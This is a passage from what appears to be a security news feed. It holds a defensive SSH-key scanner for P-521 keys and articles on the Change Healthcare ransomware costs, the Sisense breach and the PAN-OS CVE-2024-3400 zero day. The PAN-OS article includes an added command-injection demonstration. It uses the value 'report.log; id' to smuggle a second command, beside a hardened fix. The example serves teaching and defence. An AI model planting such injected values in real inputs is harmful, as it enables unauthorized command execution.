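def read_ssh_string(blob: bytes, offset: int = 0) -> tuple[bytes, int]:
    """Decode one length-prefixed string from an SSH blob."""
    (length,) = struct.unpack_from(">I", blob, offset)
    start = offset + 4
    if start + length > len(blob):
        raise ValueError("truncated SSH string")
    return blob[start:start + length], start + length


def parse_authorized_keys(text: str) -> list[dict]:
    """One record per key line: declared type, type embedded in the blob, comment.
    Options such as from= or command= (which may contain quoted spaces) are
    skipped by locating the first token that looks like a key type."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            records.append({"line": lineno, "declared": None, "embedded": None,
                            "comment": "", "error": "no key type/blob"})
            continue
        declared = tokens[idx]
        try:
            blob = base64.b64decode(tokens[idx + 1], validate=True)
            embedded = read_ssh_string(blob)[0].decode("ascii")
            error = None if embedded == declared else "type mismatch"
        except (ValueError, struct.error, UnicodeDecodeError):
            embedded, error = None, "undecodable blob"
        records.append({"line": lineno, "declared": declared, "embedded": embedded,
                        "comment": " ".join(tokens[idx + 2:]), "error": error})
    return records


def affected_entries(text: str) -> list[dict]:
    """Entries to treat as compromised per the advisory: any whose declared or
    embedded type is ecdsa-sha2-nistp521.  The embedded type is checked as
    well because sshd trusts the blob, not the label in front of it."""
    return [r for r in parse_authorized_keys(text)
            if AFFECTED_TYPE in (r["declared"], r["embedded"])]


if __name__ == "__main__":
    for rec in affected_entries(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {rec['line']}: {rec['declared']} {rec['comment']}")
```

The scan cannot tell which of those keys were generated or used by PuTTY; that determination needs the key's owner. Treating every P-521 ECDSA key as suspect until its provenance is known is the conservative reading of the advisory.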

]]>
<![CDATA[UnitedHealth Took $872M Hit From Change Cyberattack]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/change-healthcare-ransomware-attack-cost-usd872m-so-far https://duo.com/decipher/change-healthcare-ransomware-attack-cost-usd872m-so-far

In its 2024 first quarter earnings, Change Healthcare parent UnitedHealth Group reported that the massive ransomware attack that was uncovered at the end of February has cost the company $872 million so far.

Remediation efforts are still ongoing, but UnitedHealth Group’s earnings offer a glimpse into the financial costs of the attack in the eight weeks since it was announced. The $872 million figure comprises direct response costs ($593 million), which cover restoration of the company’s platform and the increased medical care expenditures incurred after the company suspended care management activities to help care providers with their workflow processes, and business disruption impacts ($279 million) from the attack.

"The company continues to make significant progress in restoring the affected Change Healthcare services while providing financial support to impacted health care providers," according to UnitedHealth Group’s Tuesday earnings release. "To date, the company has provided over $6 billion in advance funding and interest-free loans to support care providers in need."

Overall, in its first quarter earnings UnitedHealth Group said its revenue increased almost $8 billion year-over-year to $99.8 billion. The company, however, is still grappling with the fallout from the ransomware attack that occurred in late February, which included a reported $22 million payment to the BlackCat ransomware affiliates behind the attack and led to delays in patient care, prescription orders and payments, impacting providers, pharmacies and hospitals across the U.S.

Though most systems are online and claims processing is underway, UnitedHealth Group is now facing a second ransom demand from another ransomware group affiliate that claims to have patient and corporate data stolen from Change Healthcare’s systems.

The federal government has also stepped in, with the Department of Health and Human Services Office for Civil Rights in March opening an investigation into the incident and whether protected health information was compromised. In a new update on its website on Monday, Change Healthcare said that at this time, the company “knows that the data had some quantity of personal health information and personally identifiable information.”

“We are working to determine the quantity of impacted data, and we are fully committed to providing notifications to impacted individuals when determinations are able to be made — and will work with the Office of Civil Rights and our customers in doing so,” according to UnitedHealth Group’s update this week.

Lasting Damages

While UnitedHealth Group’s financial reports are one way to gauge the impact of the ransomware attack, the incident has a far-reaching and ongoing effect on many other organizations across the industry that's harder to pinpoint.

In a Tuesday hearing by the House Energy and Commerce Subcommittee on Health - titled "Examining Health Sector Cybersecurity in the Wake Of The Change Healthcare Attack" - government and healthcare entities talked about the ongoing impacts of the attack. Representatives from UnitedHealth Group did not participate in the hearing.

Adam Bruggeman, an orthopedic surgeon with the Texas Spine Center, said that the cyberattack led to his practice being unable to process claims and receive payments. While Bruggeman said his practice had enough cash reserves to continue operating without receiving payments during the outage, the practice still faced a number of significant challenges in dealing with the fallout from the attack. For instance, while the practice had the option to change over to an alternative clearinghouse a few weeks after the attack, not all insurers allowed the practice to do that for claim submissions, because integrating with a new clearinghouse is costly and time consuming.

“This made switching impractical,” said Bruggeman. “Instead, we had to either hold claims in limbo or resort to submitting them through individual online portals.”

The practice also could not receive ERAs (electronic remittance advices) from insurers, which typically accompany deposits in its bank account and give important information about which bills have been paid. As a result, many patients received automated bills that should have been marked as paid, leading to confusion and frustration among patients, said Bruggeman.

Another ongoing issue is the lack of transparency around the attack. Scott MacLean, Board Chair of the College of Healthcare Information Management Executives (CHIME) and SVP and CIO of MedStar Health, said that from the start, many members of CHIME “found themselves struggling to navigate the most significant cyber incident to hit our sector.” IoCs were not widely shared immediately, for instance, and for a certain period of time organizations weren’t sure which systems were safe to reconnect to.

“Following the attack, there was a dearth of information and our members found themselves in the dark navigating an extremely complex and far-reaching attack with few answers, and few options for continuing operations,” said MacLean. “The lack of answers hampered and continues to hamper recovery efforts.”

]]>
<![CDATA[CISA Warns of Sisense Breach]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/cisa-warns-of-sisense-breach https://duo.com/decipher/cisa-warns-of-sisense-breach

The Cybersecurity and Infrastructure Security Agency is responding to an intrusion affecting Sisense, a major provider of business and data analytics, that involves the compromise of customer data.

The agency released an alert about the incident on Thursday morning and Sisense has reportedly notified customers but has not released any public statements about the intrusion yet. CISA said independent security researchers discovered the compromise, and the agency urged Sisense customers to rotate their credentials.

“CISA is taking an active role in collaborating with private industry partners to respond to this incident, especially as it relates to impacted critical infrastructure sector organizations. We will provide updates as more information becomes available,” the CISA advisory says.

Sisense provides a number of business analytics products, including a platform and a cloud-based service. The company lists a slew of high-profile customers on its site, including NASDAQ, AirCanada, and others. The platform typically requires extensive permissions and deep integration into enterprise environments. Researchers say that the information the unnamed attackers were able to exfiltrate from Sisense includes credentials and authentication tokens for some of the apps the platform integrates with.

Late on Thursday, Sisense CISO Sangram Dash sent a communication to customers about the incident and outlined a long list of actions they should take in order to protect their organizations, including changing any and all Sisense-related passwords, changing passwords for all Sisense users, and logging all users out of the platform. For organizations that employ single sign-on, the company also recommends changing shared secrets for SSO, rotating the X.509 certificate for the SSO SAML provider, and changing the OpenID client secret for companies that have implemented OpenID.

“Our customers must reset any keys, tokens, or other credentials in their environment used within the Sisense application,” the message says.

Sisense has not released any public statements about the incident yet.

]]>
<![CDATA[Palo Alto Networks Discloses Critical PAN-OS Zero Day]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/palo-alto-networks-discloses-critical-pan-os-zero-day https://duo.com/decipher/palo-alto-networks-discloses-critical-pan-os-zero-day

UPDATE - Patches are now available for a critical-severity vulnerability in Palo Alto Networks' PAN-OS software for firewalls. The flaw, first disclosed on Friday, is being exploited in the wild.

The vulnerability (CVE-2024-3400) ranks 10 out of 10 on the CVSS scale and stems from a command injection issue in the GlobalProtect feature of PAN-OS. It could enable unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The flaw is exploitable on specific OS versions - PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls - if both GlobalProtect gateway and device telemetry are enabled in the configuration.
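To make the bug class concrete, the following Python is an added example, not PAN-OS code and not a description of CVE-2024-3400's actual code path: a hypothetical telemetry-export helper that interpolates request-controlled input into a shell command, shown beside a hardened version. The directory, archive path and filename parameter are invented for the illustration; `shell_would_run` tokenises the unsafe string the way a POSIX shell would, so the effect of a stray `;` is visible without executing anything.

```python
import re
import shlex

# Hypothetical paths for the illustration; nothing here is taken from PAN-OS.
TELEMETRY_DIR = "/var/telemetry"
ARCHIVE_PATH = "/var/tmp/telemetry.tgz"
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def build_command_unsafe(filename: str) -> str:
    """Command injection pattern: request-controlled input is interpolated into
    a string that is later handed to a shell.  Returned, not executed."""
    return f"tar czf {ARCHIVE_PATH} {TELEMETRY_DIR}/{filename}"


def build_command_safe(filename: str) -> list[str]:
    """Hardened form: strict allowlist on the name, no shell (argv list rather
    than a string), and '--' so a name can never be parsed as a tar option."""
    if not SAFE_NAME.fullmatch(filename) or filename in (".", ".."):
        raise ValueError("rejected telemetry file name")
    return ["tar", "czf", ARCHIVE_PATH, "--", f"{TELEMETRY_DIR}/{filename}"]


def is_rejected(filename: str) -> bool:
    """True when the hardened builder refuses the name."""
    try:
        build_command_safe(filename)
    except ValueError:
        return True
    return False


def shell_would_run(command: str) -> list[list[str]]:
    """Tokenise a command string as a POSIX shell would and split it into the
    separate commands the shell would execute at ';' boundaries."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    # A benign canary shows the string form spawning a second command.
    print(shell_would_run(build_command_unsafe("report.log; id")))
    print(build_command_safe("report.log"))
    print("rejected:", is_rejected("report.log; id"))
```

The hardened form addresses the defect at three layers: an allowlist on the input, no shell in the execution path (an argv list instead of a string), and `--` before the operand so the name cannot be read as an option. Disabling the feature that consumes the input, as the vendor's interim mitigation does with device telemetry, removes the reachable path while a fix is pending.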

“Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024,” according to the advisory on Friday by Palo Alto Networks. “Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.”

In its advisory, Palo Alto Networks said that users can verify if they have the GlobalProtect gateway and device telemetry configured by checking for entries in the firewall web interface.

The hotfix releases won’t be available until Sunday, but Palo Alto Networks has provided customers with several mitigations in the meantime, including temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version.

Details of the Exploitation

Volexity researchers on Friday said that they discovered a threat actor, which they track as UTA0218, leveraging the vulnerability.

The researchers first identified zero-day exploitation of the flaw on April 10, after receiving alerts about suspicious network traffic from the firewall of one of the company's customers. However, the researchers said the earliest evidence of attempted exploitation dates back to March 26.

"A subsequent investigation determined the device had been compromised," said Volexity researchers in a Friday analysis of the flaw. "The following day, April 11, 2024, Volexity observed further, identical exploitation at another one of its NSM customers by the same threat actor."

The attacker was able to remotely exploit the bug to create a reverse shell and download post-exploitation tools, including a novel Python-based backdoor.

"The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations," according to Volexity's threat research team. "During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests."

Impacted users are urged to apply mitigations and patches when available. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday also added the flaw to its known exploited vulnerabilities catalog, where it lists flaws that are “frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.” Federal agencies have a deadline of April 19 to patch the flaw.

This article was updated on April 16 to reflect that patches are now available for the flaw.

]]>